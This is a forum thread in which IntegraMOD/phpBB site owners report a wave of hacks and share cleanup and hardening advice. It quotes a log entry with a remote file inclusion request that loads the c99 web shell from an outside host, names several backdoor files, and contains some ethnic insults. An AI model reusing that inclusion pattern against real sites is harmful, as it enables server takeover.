IntegraMOD

[psyperu]

I cant acces to Admin Panel

only show this message

Hacked By CyberLord FOR ISLAM

Any solution <img>

my web is http://www.vuelamaria.com/portal

[Bush]

Reinstall <img>

[suicico]

just today i got hacked as well ..
i wasnt able to load my site at all .
so i went to my latest visitors page and i noticed that the visitor with the i.p : 172.151.112.178
was fooling around with functions.php .
to be more precise here is an example
/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Ftz4rr.webcindario.com%2Fc99shell.gif%3F&act=img&im
the other think to get you suspicious is that this person came refered from google with the search "Powered by integramod"
Well this dude had deleted the content of portal.php so the solution was to overwrite it, and all came back to normal ..
just pay attention now and then to your referals .

edit. the dude did the same to index.php

[InoculateIT]

Did you CHMOD the files?

CHMOD all files 644 exept the ones mentioned in the integramod_install_guide_page1.htm

I have never been hacked <img>

[suicico]

intresting advice (lol) silly me you are right
btw .. i just got hacked again .. this time from a turkish hacker called (na i would not give him credit for this) and again was a silly xploid ..
anyhow thx

[Solomon]

One of my sites was hacked today too.


I also found a file named c99.php in the backup folder. Contents are too long to post. I'd say this is more than just a coincidence this many Integramod sites were kiddie hacked today.

[honie]

I got it today too... but my config file seems fine & Ive restored the database & portal & index files & its still there. Argh. Any ideas ? Im at http://www.policewives.org

[jwernerny]

c99.php is a backdoor hacker script that is installed to writable directories. I had another version of it on my site a while back and it keeps trying to come int. It was called musa.php then.

Anyone want to share what hosting service their sites were on?

- John

[Solomon]

c99.php is a backdoor hacker script that is installed to writable directories. I had another version of it on my site a while back and it keeps trying to come int. It was called musa.php then.

Anyone want to share what hosting service their sites were on?

- John

I just whiped out musa.php right before you posted. Your asking what hosting service, is this relevant for prevention? In other words, do some hosters block this backdoor script and others do not?

[honie]

Ive looked & I cant find either of those files, which directory would they be in?

BTW, my host is globat

[Solomon]

Ive looked & I cant find either of those files, which directory would they be in?

BTW, my host is globat

I honestly already forget, but try forum/modules/cache/explain/

also check /forum/includes/cache_tpls/

Look for files that were modified today that look fishy. Try comparing questionable files to previous complete backups or even stock Integramod files.

[odius]

yea i just restored my hacked site, just had to replace the config.php and i think it was cookies.php which was givin the errors about the include files bein messed.. or maybe it was the way i did config.php.. did it twice.

yea found bnc.txt in the backup folder.. im runnin integramod 1.4 with phpBB 2.0.19

my config WAS chmod 666, now its 644, i think thats fine????

is there an app like SFC.exe for winXP (system file checker) to check to see if there's any more crap they uploaded, and maybe somethin to check all the permissions too

[honie]

K, I checked there too & nothing weird. I am stumped I have no clue what to do next.

[Solomon]

just today i got hacked as well ..
i wasnt able to load my site at all .
so i went to my latest visitors page and i noticed that the visitor with the i.p : 172.151.112.178
was fooling around with functions.php .
to be more precise here is an example
/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Ftz4rr.webcindario.com%2Fc99shell.gif%3F&act=img&im
the other think to get you suspicious is that this person came refered from google with the search "Powered by integramod"
Well this dude had deleted the content of portal.php so the solution was to overwrite it, and all came back to normal ..
just pay attention now and then to your referals .

edit. the dude did the same to index.php

Yup, my referrals list shows:

Referrer Host: http://www.google.com.tr
Referrer URL: http://www.google.com.tr/search?q=Power ... rt=40&sa=N
Referrer IP: 85.102.183.32
[hr:30wm7usw]
Blocking http://www.google.com.tr & http://www.google.com.ru in the ACP/Security/Special/Block Referrers section wouldn't be a bad idea. <img>

[odius]

what versions are u guys runnin, are u not updated like me or what, lets fix this lol

[Solomon]

what versions are u guys runnin, are u not updated like me or what, lets fix this lol

Revealing this can actually compromise a site's security due to exploits are often version specific.

[honie]

No, I did all the updates and still got it

[suicico]

yeah .. i wasnt updated .. indeed ..
but the main problem must been in the chmod of functions_portal.php .. cause thats the one the 1st kidie was attempting to hack .
at one of my files there was a irc channel, and i visit this chanel and at the topic of the channel was the command used at the url, so here is your reason of that many integramod sites xploided today . i would expect more to come.
in any case now im on 2.2.1 and with 'right' chmod i believe the site is safe from this xploied .
In anycase the good news is that they only mess with the php part and not the mysql <img>

[Solomon]

[quote=""suicico";p="14021""]yeah .. i wasnt updated .. indeed ..
but the main problem must been in the chmod of functions_portal.php .. cause thats the one the 1st kidie was attempting to hack .
at one of my files there was a irc channel, and i visit this chanel and at the topic of the channel was the command used at the url, so here is your reason of that many integramod sites xploided today . i would expect more to come.
in any case now im on 2.2.1 and with 'right' chmod i believe the site is safe from this xploied .
In anycase the good news is that they only mess with the php part and not the mysql
Silly Turks! <img>

[suicico]

i wouldnt judge the turks as silly .. BUT
when i tried to log in to my site yesterday and i saw something like
Im a turkish hacker
i fuck greece ..
i thought that yea .. some turkish are braindead .
<img>

[ZacFields]

Well I have not been hacked and thanks to your posts I am making a database backup as we speak, but if you guys are looking for terms on your site that you can remove to prevent being targeted by searches like this, here are a few that I can think of:

-powered by phpbb
-powered by integramod <--- You definitely should change the layout of this in your footer in some way to keep it off those searches. I actually have this one in my referrals right now...but I was not hacked today to my knowlege.
-powered by knowledge base (I keep getting this one...every month)


A good way to prevent hackers is to create your own alteration of the information given in the footer of your site.

I'm digging through my logs right now to see if I have anything to worry about. I also have an extra password setup on my admin panel too which could help (just a popup pass) but looks to me like the hacker didn't go into you guys' admin panels right?

Zac

[suicico]

no they didnt . the most harm they did was to rewrite the config.php
nothing to do with mysql .
about Powered by knowledge base ..
yea i have notice it at my referals aswell but i think the security get it .
And as for the footer . well i always want to keep the copyrights thats why i never mess with em .
But to alter em hmm <img>
something like Powered by integra-mod <<< ?
would that keep me off the search results ?
and if yes .. is it ok with integra ?
anyhow it is a nice idea.

[jwernerny]

I just whiped out musa.php right before you posted. Your asking what hosting service, is this relevant for prevention? In other words, do some hosters block this backdoor script and others do not?

I did some research on musa.php when it first appeared on my site a couple of months ago. If you run the code (it is an interesting app to play with), one of the options it gives is to install a copy of itself into any writable directory you choose. One of the popular ways it is installed is to randomly target writable directories and try to put copies in there. This can only happen on a single machine (or a machine with NFS access to another machine). Once a single user on shared machine is compromised, it is very easy for other users to be compromised.

The reason the host is important is it can help alert other people who might have the same host to watch out for it.

If your find it on your site, you should alert your hosting service so they can check for it on other places.

BTW, some hosting services also have online virus checking for their hosted files. The virus checking does pick this up. I try to run it once every couple of days as a precaution.

I also suggested that the next security_mod look for extra files in known writable directories, but the author of that mod was not sure if he could get it implemented.

- John

[odius]

anyone wanna holla the proper chmod settings??
also found this "includes/cache_tpls/musa.php" (158kb) with a few other files im lookin through..

zh.php,
eLHacKeR1 12 k,
SendTo.php 8 k 0644
httpd 11 k is bullshit too

index.php 5 k 0644 and mailer.php are both the same file in that folder too. foot.php & head.php are part of the mailer too.

i think thats all in that folder.. deleted em all

what should the chmod for that folder be.. it was 777

[Solomon]

2nd time hacked in less than 24hrs.

Little e-peen Team was here !
Fatal error: Call to undefined function: phpbbsecurity_blocks() in /home/xxxxxxx/public_html/forum/common.php on line 392

My phpbb_security.php file contents were deleted and replaced with "Little e-peen Team was here !". This file was set to CHMOD: 666

phpbb 1.0.3 and/or phpBB 2.0.21 have a hole in it?
CHMOD settings are all in tact.
Never had a problem until I did the integraMOD 2.0.21 update.

Future prevention suggestions?

[suicico]

after being hacked more than 5 times in something more than 24 hours, i had deleted some (many files) that look suspicious mine files where at public_html/files/.sec/many files in here
anyhow since my site isnt international i have banned a range of ip from turkey (since those where the ones that hacked me a lot) and banned all users that use proxies .
if you know how just pm me .
since the bans .. all good to me <img>
ps . i dont think it has to do with 2.0.21 either with 1.0.3 since i had 1.0.2 and 2.0.19 when this startted.
a litle note is that they where looking for integra meaning that the hole is in integra and not on phpbb, also the file that they usually attack is functions_portal.php which is integras file .

[Unregistered]

hmm interesting conversation..
anyways, just thought of droping some hints on how to prevent hacking attempts...

ive changed my admin/ dir to something else.. there for am the only one who knows how to get into admin pane.. eg: http://www.domain.com/secret-dir
and create a dummy admin folder and put a directory password..

another thing is, ive deleted all database related files from my admin panel.. even if anyone execute a cmd to remove db via admin pane, then it wont work..

and keep ur secutiry settings at the maximum level..

And ive tested version 141.. it has an aditional security feature, which gives more and more hard time for a hacker to attack..

[Unregistered]

one more thing.. the backup folder you guys talking abt... wel, put a password on that folder as well.. <img>

[suicico]

also i dont know if this help but doing a search on google about functions_portal.php i came to this
http://www.integramod.com/forum/viewtop ... e0e7bfb752
this sounds like a solution i think

[Solomon]

one more thing.. the backup folder you guys talking abt... wel, put a password on that folder as well.. <img>

First hack they used the "backup", "modules", & "/includes/cache_tpls" folders (all CHMOD: 777) to upload their files, second time hacked they used the "files" folder (CHMOD: 777) to upload their files since I deleted the "backup" folder because I dont use the IntegraMOD backup utility.

also i dont know if this help but doing a search on google about functions_portal.php i came to this
http://www.integramod.com/forum/viewtop ... e0e7bfb752
this sounds like a solution i think

I was just looking at that file and wondering why that code was missing.

The IntegraMod_2020_to_2021.txt instructions say:

Code: Select all

#-----[ OPEN ]---------------------------------------------#includes/functions_portal.php  ##-----[ FIND ]---------------------------------------------# Line 22include_once($phpbb_root_path . 'includes/lite.'.$phpEx);  ##-----[ BEFORE, ADD ]---------------------------------------------#if ( !defined('IN_PHPBB') ){     die('Hacking attempt');     exit;}

But the pre-modded file included in the update package does not have this code and is dated: Monday, August 08, 2005, 11:27:08 AM.

[ihammo]

Does anyone know yet exactly where/how this exploit starts? Is it the missing code in functions_portal.php?

I want to make sure that before I bring stuff back up it really is fixed.

As it is my provider has shut my site down as they had uploaded several trojans and were using my server as a point o launch other attacks.

backdoors to look for are:

Ronin
dc
bindtty

tomorrow is going to be a long day

[ihammo]

further to that - i noticed other function_xxxxx files in the includes folder also dont have the code below at the top. can anyone say if they shoudl have or not??

if (!defined('IN_PHPBB'))
{
die('Hacking attempt');
}

[MercAngel]

just found out a site i am and admin on was also hacked

but the other site i own was not and ther are links back to mine on the one that was hacked so maybe is is a host thing

[Unregistered]

all the sites which used premoded files were hacked? or did u guys updated manually by using FIND / REPLACE codes?

[Driver 7]

Bloody hell. I was hacked also.

[Drop-Forged]

all the sites which used premoded files were hacked? or did u guys updated manually by using FIND / REPLACE codes?

I used premoded files on my site, and yes was hackedà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦. <img>

[ZacFields]

ihammo,

yes that string of code is supposed to be there for security purposes.

Zac

[Rabi]

I was hacked also....

[Solomon]

Make that 3x hacked in less than 48 hours. See this thread if you already havent. http://integramod.com/forum/viewtopic.php?t=1944

[Driver 7]

It's an automated hacking script as far as I can tell.

It looks to me like the place of entry was through somewhere inside the chatspot folder.

[Teelk]

Chatspot 1.0.0 is installed with IM, while version 2.0.0a7 is the latest version. I'll make the update available as soon as I have it all put together.

[Driver 7]

Thanks Teelk.

What is chatspot and what exactly does it do? Is it something we use or can it be removed?

[MercAngel]

are we sure they are getting in throught the forum software it self and not the host or some toher way

i had my other site open now for 48 hours i CHMOD all the file and folders to 777 so it chould be hacked easy.

i also have a packet sniffer running and so far nothing.

[MercAngel]

i have been checking the internet on this file called c99.php

i have found sites that have been hacked by this thing back to 2004

it looks like they have hacked just about every forum software there is as well as some not forums sites

[Solomon]

How come this site hasn't been hacked yet? What are they doing right, that we are all doing wrong?

[ErikG]

Could it be that it is simply written "down below". As they seem to search via google or some such and look for powered by integramod etc, but here it says powered by kismod.

Could it be so simple?

[Solomon]

Could it be that it is simply written "down below". As they seem to search via google or some such and look for powered by integramod etc, but here it says powered by kismod.

Could it be so simple?

My latest referrer was http://www.alltheweb.com and the search text was "Powered by KisMod ÂÂÂ © 2004, 2006 The Integramod Group".

I see the only difference here is 2001, 2006, but mine doesnt say KisMod, it said IntegraMOD, so it was found anyways. They use the search engines to find forums to victimize, but I'm sure they know the main url here as well. So no it cant be that simple. I would think they would target this site first then the rest of the sites. It would sure suck if we couldnt get help here because it was down. *knock-on-wood*

You can block referres in the ACP or a better method is to block them in the ".htaccess" file. Information on how can be found here <img> http://www.javascriptkit.com/howto/htaccess14.shtml

[evolver]

Euhm, how many of these hacked sites have a link on integraMOD2.com...
...or maybe even still on integraMOD.com ??

No need for Google to find these...
No need for 'Powered by' keywords to find these...

There are easier ways to find integraMOD sites than just by using Google...
And ofcourse, that could also be a very good reason why integraMOD.com hasn't been hacked yet...

Just don't focus at one direction only...
Think about every possibility, because that's how hackers think as well...

[joescamera]

Hello - I was also hacked on the 24 and again the 25th (after I'd successfully got my site back and running by replacing the config.php file)

Unfortunately, when "they" hacked me on the 25th, EVERY file and folder was deleted from my host's server. <img> (this was Saturday and have been siteless since).

I received an email from my host this evening after constant chasing, which may or may not help the current issue:


Thank you for contacting us.

Searching your access logs it seems your site was hacked on the 24th
(and again today). I will restore a backup from the night of the 23rd
which should contain everything you are missing. I recommend updating
your phpbb forum to the newest version because it seems that is how they
got in. If you look in your logs folder at the access.log.34.4.gz file
you will see they posted a pomponk.txt file which is actually a php
script used to hack your space. The IP it comes from is 202.138.226.3
which is an Indonesian ip, which has a high rate for these things. I
will let you know as soon as the back is restored.

Obviously I don't want to just start using the software again as is, but am pretty new to "locking down" software etc - can anyone recommend some sensible precautions to make that will enable me to continue using my site for visitors to upload and post, without too much risk to my site / server?

Many thanks.

[Unregistered]

hi joescamera, ttry goin thru
http://integramod.com/forum/viewtopic.php?t=1944

[jwernerny]

I'm pretty sure these hacks are actually cross contaminations from a master server. The quick and simple way to prevent them may be to obfuscate (hide) the forum source directories and use .htaccess to make it look like things are in the expect location.

I'll explain. Let's say I am a hacker and I have compromised a website with the c99 shell script. If I know that IM1.4.0 is normally installed in "forum" and has open directories of "files," etc., and I am on a host that seems to assign user names in a regular fassion, then I can quickly infect other sights by trying to blindly write into the directories.

For instance, let's say on host "ABC_XYZZY_Hosting.com", I know have found that user are given id's in the form of "user0001", "user0002", "user0003", etc., then I can start randomly trying to write to /home/user0001/forum/files, then /home/user0002/forum/files, etc.

BTW, I got hacked this morning. I found 2 copies of c99 shell, one in files and the other someplace else. I am on WB-Hosting. If you use WB-Hosting, I strongly suggest you check things out and take some steps to make sure the well known directories are not accessible.

- John

[jwernerny]

PS: Once you are hacked, I would suggest creating a new database user name with a new password.

[Michaelo]

Cross contaminations from a master server!

This is definitely happening, I have come across it earlier today... If some one hack a site they can by the use the c99 shell script (and other scripts), as explained by jwernerny above, screw up any other phpBB/IntegraMod based site on the same server...

It is up to us to be vigilant therefore it is necessary to check you site for any file that should not be there. Note some of these files may have a php extension, if in doubt about a file check you original upload source.

Mike

[jwernerny]

Okay, I have just looked at my raw logs. My hacker definitely came through the functions.php exploit, not cross contamination. Still, I would be wary.

- John

[gcomfx.com]

My host shut me down.

my integramod forum was spamming.

includes folder was sending out 4540 emails.

UGH.... I'm trying to get my host to let me put up an announcement page and leave everything else off until a solution is found for all of this.

[gcomfx.com]

Okay guys, I basically killed my cpanel account and started all over. I have yet to upload integramod.

However, in my error log, I'm showing a lot of attempts to get to:

community/phphtmllib/tag_utils/divtag_utils.php

and

community/export.php

Could this be the hackers still looking? I've never seen the directory /phphtmllib before.

[InoculateIT]

[quote=""InoculateIT";p="13996""]
Did you CHMOD the files?

CHMOD all files 644 exept the ones mentioned in the integramod_install_guide_page1.htm

I have never been hacked

[Jacky]

So people with files CHMOD to 644 and folders CHMOD to 755 won't get affected by this?

[Michaelo]

[url=http]Security updates located here[/url]